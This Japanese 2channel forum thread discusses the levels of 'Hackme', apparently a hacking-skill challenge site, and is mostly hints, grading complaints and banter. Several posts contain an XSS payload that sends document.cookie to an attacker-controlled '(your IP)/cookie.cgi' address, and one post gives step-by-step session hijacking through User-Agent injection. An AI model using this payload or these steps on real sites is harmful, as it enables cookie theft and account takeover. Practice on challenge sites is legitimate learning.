【Hackme】ハッキング力検定サイトHackme

情報戦とかいいから改定前の正解晒せよ

/Lv6/ だと /Lv5 に転送されるけど、
/Lv7/ だと 404 になるから、一応Lv6は存在するのかもしれない・・

改定後の正解知ってるなら
改定前の正解とか簡単に予想つくんでは

つーかcookieのセットすらできない連中がすでにLv4まできてるとか
凄まじいな

>>916
改定後もそのまま正解だから晒せねーよ

まあ問題が「>>916のレスを表示せよ」で
要求したURLが
http://hibari.2ch.net/test/read.cgi/sec/1297835390/916- では駄目で
http://hibari.2ch.net/test/read.cgi/sec/1297835390/916 のみが正解だった
理由は916-の方は分散して微妙に見難くなるから
まあその程度の理不尽

いつの間にやらスレが埋まりそうな感じだな。

999にLV4の答えを書く

じゃあLV5のヒント：javascriptエラーがある

>>923
具体的にどこに？

まぁLv4に関してはもう答え晒されてるようなもんだしそろそろどっかの誰かがまた「晒されてますよ？」
って中の人にいうんじゃないかと・・・ｗ

>>922
早くかけよ

>>922
早くかけよ

>>922
早くかけよ

>>922
早くかけよ

>>922
早くかけよ

ネタバレって規約違反じゃね？

>>922
早くかけよ

>>922
早くかけよ

>>922
早くかけよ

中の人も「やめて＞＜」って言ってるくらいだしなｗ
正直ただでさえ楽っていうか分かりやすくになったのにこれ以上分からんとか言ってるのは1から勉強しなおせレベル。

</li><script>document.location="http://(貴方のIP)/cookie.cgi?cookie="+document.cookie;</script><li>

おい、あんまりいじめてやるなよw

埋め

まだ>>999になってないぞ。早漏め

あーLv5いけたかも。

>>939
それらしいヒントとかあった？

>>939
kwsk

現在LV4総勢148人
↓増え続ける

こんだネタバレあってわかんないのはそもそもxssとか名称だけしっててやってることは理解してないんだろうな

やった、Lv4通ったー
昨日やって通らなかったはずのが通った
SQLインジェクションとかXSSとか名前だけ知ってる程度の知識だったけど、どういう仕組か理解できたわ
Lv3はUNIXすこし触ったことあったからすぐ理解できた

Lv3についてはかなり初期の時点で誰かがディレクトリトラバーサルって単語漏らしたからググってクリアしたんだけど、あの人は全然叩かれないんだな

ネタバレ起きてから合格しても同格とか思わないでほしいんで、その辺夜露死苦

>>945
URLみたら誰でもすぐに思いつくことだからね。
あたり前のこととしてスルーされたんじゃね。

あれみてディレクトリトラバーサルと思いつかないような奴は普通Lv3までいけないはずなんだよなｗｗ
tempとかUNIXそのまんまだし

ディレクトリトラバーサルはネタバレとはいえない
レベルのすぐ分かることだな。

レベル4でネタバレになったのはUAに突っ込むというアイデアだ。
自力で「ウホッ」と気付いたやつは自負していいレベルだけど
ここまできてもクリアできてないやつはもう本筋から離れたレベル。
自分が一番よく分かってるだろうｗ

>>948
突っ込んでほしいのか？

やっぱ時系列は上から下としか思えない

lv5ェ・・・

今見たら157人がLv4クリア
流石にだいぶ増えたな

俺がuser-agentって書いた時点では10人ぐらいだったのになぁ

判定基準甘くなったからな・・・昨日ダメなのが今日は行けたし

まぁ、所詮セキュ板の雑魚どものレベルなんてそんなもんだ

>>955
そこらへんなんとかして欲しかったよな

Lv2とLv4はそれぞれ2つか3つくらいのレベルに分けて
手法は同じでも
Lv2-easyはオーソドックスなパターン
Lv2-normalはちょっとひねったパターン
Lv2-hardは珍しいパターン
みたいにすればよかったのにね
これなら途中で判定基準変えたりして文句も言われなかったかも

関係ないけどBackTrackのページの左側に勇気、力、決心って書いてあってワロタ
なんの意味があるんだろうか

LV5は株式会社ネットファイアの製品netfire-v1の試験だな

ランキングの称号が「ハッカーの方々」から「仮免許ハッカーの人」になってるw

この会社、煽ってくるぞｗ

「仮免許ハッカー」です。なかなか。
やりますね。ちゃんと自前でできたかな？チートしちゃだめだよ？
ﾜﾛｽ

「仮免許ハッカー」です。なかなか。
やりますね。ちゃんと自前でできたかな？チートしちゃだめだよ？

クソ吹いたｗｗｗｗ
むしろ判定基準がチートだと思うがｗｗ

中途半端にスクリプト通らないからもうややこしい
って会社が煽るなよｗｗｗ

ネタバレ位想定できただろうにw、それで煽ってくるとかw

ほんとだ、さっきまで
セキュリティ関係なら簡単かな？
みたいな感じのコメントだったのにwww

これでまさかのlv5がランキングページ書き換えでした！とかだったらどうしよう・・・

http://twitter.com/#!/passa/status/40993999892389888
ちょっと煽り過ぎた。反省。 #hackme
37秒前 twiccaから

自鯖がいるようでいらない、sessionidなようでsessionidじゃない

やりますね。自分でわかってクリアしたのなら、優秀なハッカーになれるかもしれません。
に変わったｗ

■LV4のクリア方法（ネタバレ）

firefoxのアドオンにCS LiteとUser Agent Switcherをインストールします。
んで、User Agent Switcherで新しいUser Agent(以下UA)を作り、User Agentの項目に
</li><script>document.location="http://(貴方のIP)/cookie.cgi?cookie="+document.cookie;</script><li>
と書きます。
そのUAに設定して適当なID・PASSでログインします。
すると左下にセッションIDを盗みました的なAJAXウインドウが出てきます。
盗んだセッションをCS Liteアドオンを使って自分のブラウザのクッキーに登録します。
そして戻るボタンをクリックするとクリアできます。

ｍ

>>969
書き換わったｗ

「仮免許ハッカー」です。なかなか。
やりますね。自分でわかってクリアしたのなら、優秀なハッカーになれるかもしれません。


どうせならクリア時に、お手本を公開すればいいのになぁ(特にlv4)
昨日と今日で判定基準変わってるんだし

結局昨日の答えはなんだったのか気になる。
最後に解答例とか出してほしいな

>>969
何だこの子素直

http://hibari.2ch.net/test/read.cgi/sec/1298605619/l50
次スレ

煽るくらいならもっと柔軟性を持った判定にしろよなー

かつてないほどセキュリティ板のアクセスが集中しております

だれか、lv2教えてくれ

>>980
SQLインジェクション

Lv2修正された？昨日よりやさしくなってるっぽいけど

今更LV2の答え教えても目立たないしな。

>>983
じゃ、おしえてくれ

煽る煽るｗ
社員２ｃｈ張り付きすぎだろｗ

>>981
そこはスレ嫁でいいんだよ
もう散々書かれてるんだから

そりゃここのスレは重要監視なんじゃね？
lv4も暫定停止フラグだなｗ

本物のハッカーが163人もいるとか不自然だろ。
最初の2〜3人ぐらいが本物なんじゃね

>>988
俺もそう思うわ。
一応、昨日クリアしたけど、その時点でもちらほらヒントが出てたしなあ。

■LV4のクリア方法（ネタバレ）

おくれましたが公開です。
まずページを開きます。
Explororのアドレス欄に次の文を打ち込みます→javascript:var t="お";var k="えア";var m="ま";var a="ホ";alert(t+m+k+a);document.write(t+m+k+a);
あとでメッセージが出てくるのでそれを読みます。
ほとんどそこまでいけばクリアですよー！

LV2合格者って1万人ぐらいいるのかな？

こんなことだけでハッカーかどうかなんてわからんだろ

判定が理不尽じゃなければ
Lv4までは解ける範囲だと思うけどなー

スレ読んでもわからん

このサイトの公開初日にLv2クリアしてたの4人くらいだったな
その最初の4人はLv4でも名前あったからその人達は本当の知識と技術があるひとだな

>>994
諦めろ

クッキーの書き換えがわからん
その域に達していないらしい
lv3まではスイスイいけたんだが
webわかんね

LV4も再度やってみたけど、自分IPとdocument.cookieの文字が入ってれば
文法的に間違ってても正解になるみたいね

>>994
それはさすがに勉強不足なだけなんじゃ・・・。

1000

このスレッドは１０００を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。